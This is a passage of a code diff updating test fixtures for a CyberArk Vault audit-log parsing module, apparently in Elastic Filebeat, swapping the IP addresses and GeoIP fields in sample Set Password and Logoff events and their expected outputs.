"source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -697,10 +676,10 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:25Z", "cyberarkpas.audit.issuer": "PSMPApp_SSH", "cyberarkpas.audit.message": "Set Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Set Password\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 05:57:25", "event.action": "set password", "event.code": "88", 
@@ -712,23 +691,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 12310, + "log.offset": 12291, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "34.71.250.247" + "81.2.69.143" ], "service.type": "cyberarkpas", - "source.address": "34.71.250.247", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.751, - "source.geo.location.lon": -97.822, - "source.ip": "34.71.250.247", + "source.address": "81.2.69.143", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -741,10 +723,10 @@ "cyberarkpas.audit.iso_timestamp": "2021-03-14T12:57:25Z", "cyberarkpas.audit.issuer": "PSMP_ADB_asr-cyberark-psm-ssh", "cyberarkpas.audit.message": "Set Password", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Set Password\n \n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "34.71.250.247", + "cyberarkpas.audit.station": "81.2.69.143", "cyberarkpas.audit.timestamp": "Mar 14 05:57:25", "event.action": "set password", "event.code": "88", 
@@ -756,23 +738,26 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 13712,
+ "log.offset": 13689,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "34.71.250.247"
+ "81.2.69.143"
 ],
 "service.type": "cyberarkpas",
- "source.address": "34.71.250.247",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
- "source.ip": "34.71.250.247",
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log b/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log
index 55eeab9c1a71..1879666bfeda 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log
@@ -4,12 +4,12 @@ <5>1 2021-03-10T08:28:29Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:29","IsoTimestamp":"2021-03-10T08:28:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAGWUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} <5>1 2021-03-10T08:28:30Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:28:30","IsoTimestamp":"2021-03-10T08:28:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PVWAAppUser","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.32.170.205"}}} -<5>1 2021-03-11T17:49:06Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} -<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Logoff\n 34.71.250.247\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"34.71.250.247"}}} +<5>1 2021-03-10T09:11:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:33","IsoTimestamp":"2021-03-10T09:11:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T09:12:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:12:20","IsoTimestamp":"2021-03-10T09:12:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T09:12:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:12:27","IsoTimestamp":"2021-03-10T09:12:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-10T22:17:27Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:27","IsoTimestamp":"2021-03-10T22:17:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 67.43.156.14\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.14"}}} +<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n 
Logoff\n 67.43.156.14\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.14"}}} +<5>1 2021-03-11T17:49:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 81.2.69.143\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Logoff\n 81.2.69.143\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"81.2.69.143"}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log-expected.json index bc2ba6b62db8..6221aee5c510 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/8_logoff.log-expected.json @@ -308,7 +308,7 @@ "cyberarkpas.audit.message": "Logoff", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:11:33", "event.action": "logoff", "event.category": [ 
@@ -335,22 +335,19 @@ "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -366,7 +363,7 @@ "cyberarkpas.audit.message": "Logoff", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:12:20", "event.action": "logoff", "event.category": [ 
@@ -386,29 +383,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 3783, + "log.offset": 3782, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "PSMP_ADB_localhost.localdomain" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -424,7 +418,7 @@ "cyberarkpas.audit.message": "Logoff", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 01:12:27", "event.action": "logoff", "event.category": [ 
@@ -444,29 +438,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 4344, + "log.offset": 4342, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "PSMPGW_localhost.localdomain" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" @@ -482,7 +473,7 @@ "cyberarkpas.audit.message": "Logoff", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", - "cyberarkpas.audit.station": "35.192.121.42", + "cyberarkpas.audit.station": "67.43.156.12", "cyberarkpas.audit.timestamp": "Mar 10 14:17:27", "event.action": "logoff", "event.category": [ 
@@ -502,28 +493,26 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 4903, + "log.offset": 4900, "log.syslog.priority": "5", "observer.hostname": "VAULT", "observer.product": "Vault", "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "35.192.121.42" + "67.43.156.12" ], "related.user": [ "Administrator" ], "service.type": "cyberarkpas", - "source.address": "35.192.121.42", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 38.6583, - "source.geo.location.lon": -77.2481, - "source.geo.region_iso_code": "US-VA", - "source.geo.region_name": "Virginia", - "source.ip": "35.192.121.42", + "source.address": "67.43.156.12", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -534,25 +523,22 @@ "@timestamp": "2021-03-11T17:38:13.000Z", "cyberarkpas.audit.action": "Logoff", "cyberarkpas.audit.desc": "Logoff", - "cyberarkpas.audit.gateway_station": "81.32.170.205", + "cyberarkpas.audit.gateway_station": "67.43.156.14", "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:13Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Logoff", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Logoff\n 67.43.156.14\n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", "cyberarkpas.audit.station": "127.0.0.1", "cyberarkpas.audit.timestamp": "Mar 11 09:38:13", - "destination.address": "81.32.170.205", - "destination.geo.city_name": "Barcelona", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "ES", - "destination.geo.country_name": "Spain", - "destination.geo.location.lat": 41.3891, - "destination.geo.location.lon": 2.1611, - "destination.geo.region_iso_code": "ES-B", - "destination.geo.region_name": "Barcelona", - "destination.ip": "81.32.170.205", + "destination.address": "67.43.156.14", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.14", "event.action": "logoff", "event.category": [ "authentication", 
@@ -571,7 +557,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 5447, + "log.offset": 5443, "log.syslog.priority": "5", "network.direction": "outbound", "observer.hostname": "VAULT", @@ -580,7 +566,7 @@ "observer.version": "11.7.0000", "related.ip": [ "127.0.0.1", - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "Administrator" 
@@ -598,25 +584,22 @@ "@timestamp": "2021-03-11T17:48:28.000Z", "cyberarkpas.audit.action": "Logoff", "cyberarkpas.audit.desc": "Logoff", - "cyberarkpas.audit.gateway_station": "81.32.170.205", + "cyberarkpas.audit.gateway_station": "67.43.156.14", "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:48:28Z", "cyberarkpas.audit.issuer": "Administrator", "cyberarkpas.audit.message": "Logoff", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n Logoff\n 81.32.170.205\n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n Logoff\n 67.43.156.14\n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Info", "cyberarkpas.audit.station": "10.0.2.2", "cyberarkpas.audit.timestamp": "Mar 11 09:48:28", - "destination.address": "81.32.170.205", - "destination.geo.city_name": "Barcelona", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "ES", - "destination.geo.country_name": "Spain", - "destination.geo.location.lat": 41.3891, - "destination.geo.location.lon": 2.1611, - "destination.geo.region_iso_code": "ES-B", - "destination.geo.region_name": "Barcelona", - "destination.ip": "81.32.170.205", + "destination.address": "67.43.156.14", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": 